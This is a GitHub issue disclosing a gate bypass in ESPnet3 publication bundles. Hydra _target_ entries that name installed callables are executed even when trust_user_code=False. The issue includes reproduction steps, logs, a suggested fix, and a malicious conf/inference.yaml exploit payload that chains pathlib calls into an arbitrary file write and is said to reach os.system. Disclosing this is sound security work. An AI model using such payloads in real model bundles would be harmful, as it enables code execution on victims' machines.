Skip to content

Arbitrary code execution via Hydra _target_ in ESPnet3 publication bundles loaded with trust_user_code=False #6828

Description

@3em0

Describe the bug

The ESPnet3 publication loader gates bundle loading with trust_user_code, but the gate asks the wrong question: _uses_bundled_code() (espnet3/publication/inference_model.py) only blocks a load when a config string references a Python module that is shipped inside the bundle. Any hydra _target_ that resolves to a callable already installed in the victim environment (stdlib, site-packages, or espnet itself) passes the gate with trust_user_code=False, and the config is then handed to hydra.utils.instantiate(config.model, device=device) in InferenceProvider.build_model (espnet3/systems/base/inference_provider.py:267), which recursively instantiates attacker-chosen callables with attacker-chosen arguments. A malicious publication bundle containing only meta.yaml, conf/inference.yaml and exp/model.safetensors — no Python sidecar at all — therefore executes arbitrary installed callables while the trust gate stays green. The attached PoC demonstrates arbitrary file write via a nested pathlib.Path → pathlib.Path.write_text chain; the same primitive reaches os.system / builtins.eval, i.e. full code execution. The bundled Gradio demo (espnet3/publication/demo/session.py, _build_demo_model) loads bundles the same way with trust_user_code defaulting to false, and InferenceModel.from_pretrained() exposes the same path for model-hub downloads. Both the pinned master commit and the latest PyPI release are affected (see versions below).

Basic environments:

  • OS information: Linux 6.18.33.2-microsoft-standard-WSL2 #1 SMP PREEMPT_DYNAMIC Thu Jun 18 21:54:43 UTC 2026 x86_64 (Ubuntu 24.04.3 LTS; the code path is platform-independent)
  • python version: 3.12.3 (main, Aug 31 2026, 10:18:26) [GCC 13.3.0]
  • espnet version: source checkout espnet3 at git bc6dd4a verified, and PyPI release espnet 202610.post2 verified (both vulnerable; the source checkout is imported via PYTHONPATH, tools/activate_python.sh was not built)
  • Git hash: bc6dd4ad9c522a998c0bd01c8ca30077aaa56e23
    • Commit date: Wed Sep 9 02:49:38 2026 +0000
  • pytorch version: pytorch 2.14.1+cpu

Environments from torch.utils.collect_env:

PyTorch version: 2.14.1+cpu
OS: Ubuntu 24.04.3 LTS (x86_64)
Python version: 3.12.3 (main, Aug 31 2026, 10:18:26) [GCC 13.3.0] (64-bit runtime)
Is CUDA available: False
[pip3] hydra-core==1.3.7
[pip3] omegaconf==2.3.1
[pip3] numpy==2.5.3
[pip3] safetensors==0.8.0
[pip3] soundfile==0.14.0
[pip3] torch==2.14.1+cpu
[pip3] espnet==202610.post2

Task information:

  • Task: ESPnet3 publication subsystem (InferenceModel.from_packed / from_pretrained / bundled Gradio demo), task-agnostic
  • Recipe: none — the PoC bundles are crafted directly against the espnet3.utils.publication_utils.pack_model() output contract (meta.yaml schema_version 1 + conf/inference.yaml + exp/model.safetensors)
  • ESPnet3

To Reproduce

Steps to reproduce the behavior (attachments: make_poc.py, run_repro.py, and the three prebuilt bundles; hashes in SHA256SUMS.txt):

  1. Generate the three PoC bundles: python make_poc.py — bundle-rce (positive), bundle-benign (negative), bundle-boundary (boundary control). The positive and negative bundles contain no Python sidecar.
  2. Load the negative control the way every documented consumer does: python run_repro.py bundles/bundle-benign — the load returns normally, no file is written.
  3. Load the positive control: python run_repro.py bundles/bundle-rce — InferenceModel.from_packed(..., trust_user_code=False) returns normally, and the nested _target_ chain declared in conf/inference.yaml has already written /tmp/pwned_by_espnet_bundle.txt with attacker-chosen content.
  4. Boundary control: python run_repro.py bundles/bundle-boundary — the same gate rejects this bundle with ValueError because it references the bundled bundle_probe.py, demonstrating that the gate exists but only checks code provenance, not what the config may invoke.

Expected behavior: with trust_user_code=False, loading a publication bundle must not execute attacker-controlled callables; the trust decision must cover every _target_ in the config.

Actual behavior: installed-module targets pass the gate and execute during build_model; the write happens before from_packed() returns, silently, with the safe default settings.

Error logs

Negative control (bundle-benign, no execution):

[*] calling InferenceModel.from_packed(bundle, trust_user_code=False)
INFO:espnet3.systems.base.inference_provider:Instantiating model builtins.dict on cpu (CUDA_VISIBLE_DEVICES=None, visible_gpus=0)
[+] from_packed() returned normally (trust_user_code=False)
[+] constructed model object: {'payload': 'benign-control', 'device': 'cpu'}
[i] marker file was NOT created (no write happened)

Positive control (bundle-rce, arbitrary write with trust_user_code=False — note there is no error, which is the bug):

[*] marker exists before load: False
[*] calling InferenceModel.from_packed(bundle, trust_user_code=False)
INFO:espnet3.systems.base.inference_provider:Instantiating model builtins.dict on cpu (CUDA_VISIBLE_DEVICES=None, visible_gpus=0)
[+] from_packed() returned normally (trust_user_code=False)
[+] constructed model object: {'payload': 100, 'device': 'cpu'}
[!] ARBITRARY WRITE CONFIRMED -> /tmp/pwned_by_espnet_bundle.txt
[!] marker file content: 'arbitrary write via hydra _target_ in espnet3 publication bundle (loaded with trust_user_code=False)'

Boundary control (bundle-boundary, the gate rejects bundled-code references — proving its scope):

  File ".../run_repro.py", line 39, in main
    model = InferenceModel.from_packed(bundle, trust_user_code=False)
  File ".../espnet3/publication/inference_model.py", line 287, in from_packed
    raise ValueError(
ValueError: This inference config references bundled user code. Set trust_user_code=True to allow imports from the published bundle.

The malicious conf/inference.yaml inside bundle-rce (top-level target builtins.dict, nested chain pathlib.Path → pathlib.Path.write_text; screenshots of the full session are in images/):

recipe_dir: .
input_key: speech
test_set: poc-test
model:
  _target_: builtins.dict
  payload:
    _target_: pathlib.Path.write_text
    _args_:
      - _target_: pathlib.Path
        _args_:
          - /tmp/pwned_by_espnet_bundle.txt
      - arbitrary write via hydra _target_ in espnet3 publication bundle (loaded with trust_user_code=False)

Suggested fix: move the trust decision from config-string provenance to target resolution — resolve every _target_ before instantiating and require each resolved target to come from an allowlist of known-safe builders (or from bundle modules explicitly covered by trust_user_code=True); reject, or require explicit trust for, targets resolving to stdlib/site-packages/espnet modules; apply the same validation on the from_pretrained model-hub path and in the Gradio demo loader.

poc.zip

link:
https://github.com/3em0/cve_repo/blob/main/2026/ESPnet3_trust_user_code_Gate_Bypass_via_Installed-Module_Hydra_Targets.md

No activity

Activity on this issue will appear here.

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    Bugbug should be fixed

    Type

    No type

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions